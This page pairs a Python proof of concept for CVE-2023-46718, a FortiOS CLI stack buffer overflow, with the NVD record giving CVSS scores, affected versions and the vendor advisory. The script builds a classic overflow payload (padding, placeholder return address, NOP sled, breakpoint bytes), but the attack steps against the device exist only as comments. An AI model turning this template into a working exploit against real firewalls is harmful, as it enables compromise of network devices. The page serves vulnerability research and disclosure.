CVE-2023-46718

# FortiOS CLI Stack Buffer Overflow PoC (CVE-2023-46718) # This is a conceptual PoC demonstrating the vulnerability pattern # Actual exploitation requires local access with high privileges import struct import socket def generate_overflow_payload(buffer_size=256, overflow_length=512): """ Generate a CLI command payload that triggers stack buffer overflow in FortiOS CLI parser (CVE-2023-46718) """ # Normal CLI command prefix (example: diagnose command) normal_cmd = b"diagnose " # Padding to fill the original buffer padding = b"A" * buffer_size # Overwrite saved return address (example: 0x41414141 placeholder) ret_address = struct.pack("<I", 0x41414141) # Shellcode placeholder (NOP sled + payload) nop_sled = b"\x90" * 32 shellcode = b"\xcc" * 64 # INT3 breakpoints for debugging # Construct overflow payload payload = normal_cmd + padding + ret_address + nop_sled + shellcode payload = payload[:overflow_length] return payload def exploit_fortios_cli(target_host, target_port=22, username="admin", password=""): """ Conceptual exploit flow for CVE-2023-46718 Requires valid credentials with high privileges """ payload = generate_overflow_payload() print(f"[*] Target: {target_host}:{target_port}") print(f"[*] Payload length: {len(payload)} bytes") print(f"[*] Attempting to authenticate with high-privilege credentials...") # Step 1: Establish SSH connection to FortiGate device # Step 2: Authenticate with admin credentials (PR:H required) # Step 3: Enter CLI mode # Step 4: Send crafted CLI command to trigger overflow # Step 5: Overwrite return address to redirect execution # Step 6: Execute shellcode for arbitrary code execution print(f"[!] Note: This is a conceptual PoC for security research") print(f"[!] Actual exploitation details are intentionally abstracted") print(f"[!] Refer to FG-IR-23-354 for official advisory") if __name__ == "__main__": # Example usage (DO NOT use against unauthorized systems) exploit_fortios_cli("192.168.1.1")

{"cve": {"id": "CVE-2023-46718", "sourceIdentifier": "[email protected]", "published": "2025-10-14T16:15:33.653", "lastModified": "2025-10-16T13:01:25.443", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A stack-based buffer overflow in Fortinet FortiOS version 7.4.0 through 7.4.1 and 7.2.0 through 7.2.7 and 7.0.0 through 7.0.12 and 6.4.6 through 6.4.15 and 6.2.9 through 6.2.16 and 6.0.13 through 6.0.18 allows attacker to execute unauthorized code or commands via specially crafted CLI commands."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "baseScore": 6.7, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 0.8, "impactScore": 5.9}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.8, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-121"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:fortinet:fortios:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.0.13", "versionEndIncluding": "6.0.18", "matchCriteriaId": "B338ECA4-60FD-499E-B22B-0F6D892C1896"}, {"vulnerable": true, "criteria": "cpe:2.3:o:fortinet:fortios:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.2.9", "versionEndIncluding": "6.2.17", "matchCriteriaId": "4BE3691A-0ECF-4FBF-A794-CDD14AAAA6B0"}, {"vulnerable": true, "criteria": "cpe:2.3:o:fortinet:fortios:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.4.6", "versionEndIncluding": "6.4.16", "matchCriteriaId": "FD140CE0-044F-4A24-91FF-2F9E0D020FA4"}, {"vulnerable": true, "criteria": "cpe:2.3:o:fortinet:fortios:*:*:*:*:*:*:*:*", "versionStartIncluding": "7.0.0", "versionEndExcluding": "7.2.12", "matchCriteriaId": "2337F791-B482-4C8C-85DF-F58AEC0DE277"}, {"vulnerable": true, "criteria": "cpe:2.3:o:fortinet:fortios:*:*:*:*:*:*:*:*", "versionStartIncluding": "7.4.0", "versionEndExcluding": "7.4.2", "matchCriteriaId": "4316C2EA-3D6E-4A0C-B81D-ADCE040E03E0"}]}]}, {"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:fortinet:fortiproxy:*:*:*:*:*:*:*:*", "versionStartIncluding": "7.0.0", "versionEndExcluding": "7.4.8", "matchCriteriaId": "87D8C76E-50E7-4EE4-972C-19C4A0C46FE0"}]}]}], "references": [{"url": "https://fortiguard.fortinet.com/psirt/FG-IR-23-354", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}